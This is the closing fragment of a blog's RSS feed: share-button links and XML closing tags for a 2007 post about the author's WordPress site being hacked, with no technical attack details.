	<a rel="nofollow"  href="http://yigg.de/neu?exturl=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;exttitle=I%20was%20hacked%2C%20thank%20open%20source" title="Yigg"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/yiggit.png" title="Yigg" alt="Yigg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://news.ycombinator.com/submitlink?u=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;t=I%20was%20hacked%2C%20thank%20open%20source" title="HackerNews"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/hackernews.png" title="HackerNews" alt="HackerNews" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;source=Shuron%27s+Letters+Personal+blog+of+Alexander+Holbreich&amp;summary=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20" title="LinkedIn"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/linkedin.png" title="LinkedIn" alt="LinkedIn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.webnews.de/einstellen?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source" title="Webnews.de"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/webnews.png" title="Webnews.de" alt="Webnews.de" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://buzz.yahoo.com/submit/?submitUrl=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;submitHeadline=I%20was%20hacked%2C%20thank%20open%20source&amp;submitSummary=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20&amp;submitCategory=science&amp;submitAssetType=text" title="Yahoo! Buzz"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/yahoobuzz.png" title="Yahoo! Buzz" alt="Yahoo! Buzz" class="sociable-hovers" /></a>


<br/><br/>]]></content:encoded>
			<wfw:commentRss>http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
